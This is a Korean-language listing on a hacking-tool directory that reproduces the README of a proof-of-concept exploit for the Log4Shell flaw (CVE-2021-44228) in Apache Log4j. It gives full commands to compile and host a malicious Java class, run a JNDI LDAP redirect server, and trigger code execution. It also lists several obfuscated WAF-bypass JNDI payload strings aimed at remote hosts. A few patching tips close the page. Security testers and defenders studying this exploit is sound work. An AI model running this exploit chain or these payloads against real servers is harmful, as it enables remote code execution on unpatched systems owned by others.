Skip to content
KitploitKITPLOIT
도구익스플로잇블로그
Log in
제출
도구익스플로잇블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

피드문의개인정보© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2021-44228-Apache-Log4j-Rce-main — JNDI LDAP/RMI 주입, 페이로드 컴파일 및 WAF 우회 기술을 포함하여 Log4j RCE 취약점을 테스트하는 CVE-2021-44228(Log4Shell)용 개념 증명 익스플로잇. | Kitploit
도구/GitHubGitHub/ravid-checkmarx/cve-2021-44228-apache-log4j-rce-main
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationWAF BypassPenetration TestingRemote Access Tool
GitHub

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
ravid-checkmarx/cve-2021-44228-apache-log4j-rce-main

CVE-2021-44228-Apache-Log4j-Rce-main

JNDI LDAP/RMI 주입, 페이로드 컴파일 및 WAF 우회 기술을 포함하여 Log4j RCE 취약점을 테스트하는 CVE-2021-44228(Log4Shell)용 개념 증명 익스플로잇.

저장소 보기
204년 전아직 검토되지 않음

CVE-2021-44228(Apache Log4j 원격 코드 실행)

모든 log4j-core 버전 >=2.0-beta9 및 <=2.14.1

1.x 버전에는 다른 취약점이 있으며, 최신 버전으로 업데이트할 것을 권장합니다.

Log4Shell(CVE-2021-44228)과 연결된 보안 권고/게시판

사용법:

이 프로젝트를 다운로드하고, 익스플로잇 코드 blob/master/src/main/java/Exploit.java를 컴파일한 후, 컴파일된 바이너리를 다운로드할 수 있는 웹서버를 시작하세요.

git clone https://github.com/tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce.git
cd CVE-2021-44228-Apache-Log4j-Rce

javac Exploit.java

# start webserver
# For Python2
python -m SimpleHTTPServer 8888
# For Python3
python3 -m http.server 8888

# make sure python webserver is running the same directory as Exploit.class, to test
  curl -I 127.0.0.1:8888/Exploit.class

다른 프로젝트를 다운로드하고 *JNDI 참조를 반환하는 LDAP 서버 구현**을 실행하세요.

https://github.com/mbechler/marshalsec/blob/master/src/main/java/marshalsec/jndi/LDAPRefServer.java

git clone https://github.com/mbechler/marshalsec.git
cd marshalsec
# Java 8 required
mvn clean package -DskipTests
java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:8888/#Exploit"

활성화 코드 blob/master/src/main/java/log4j.java를 빌드하고 실행하면(취약한 Java 웹 서버에서 log4j 공격을 시뮬레이션) 계산기 앱이 나타납니다.

cd CVE-2021-44228-Apache-Log4j-Rce
mvn clean package
java -cp target/log4j-rce-1.0-SNAPSHOT-all.jar log4j

# expect the following
# 1. calculator app appear
# 2. in ldapserver console,
#  Send LDAP reference result for Exploit redirecting to http://127.0.0.1:8888/Exploit.class
# 3. in webserver console,
#  127.0.0.1 - - [....] "GET /Exploit.class HTTP/1.1" 200 -

팁:

현재 Java 버전이 당신을 구해주리라 믿지 마세요. Log4(또는 JNDI lookup을 제거)를 업데이트하세요. 확장을 비활성화하세요(어차피 꽤 나쁜 생각인 것 같지만).

rc1 우회

예를 들어:

${jndi:ldap://127.0.0.1:1389/ badClassName}

WAF 우회

${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://asdasd.asdasd.asdasd/poc}
${${::-j}ndi:rmi://asdasd.asdasd.asdasd/ass}
${jndi:rmi://adsasd.asdasd.asdasd}
${${lower:jndi}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:${lower:jndi}}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://xxxxxxx.xx/poc}

웹 애플리케이션 방화벽을 신뢰하지 마세요.

취약점 세부 정보

Lookups는 Log4j 구성의 임의의 위치에 값을 추가하는 방법을 제공합니다.

Lookups

finally에서 누출을 유발하는 메서드

LogManager.getLogger().error()
LogManager.getLogger().fatal()

간단한 확인 방법

블랙박스 테스트를 하려면, 수동 스캔을 권장합니다.

BurpLog4jScan

즐기세요!!! BurpLog4jScan.png

시간에 따른 Stargazers

Stargazers over time

도구 다운로드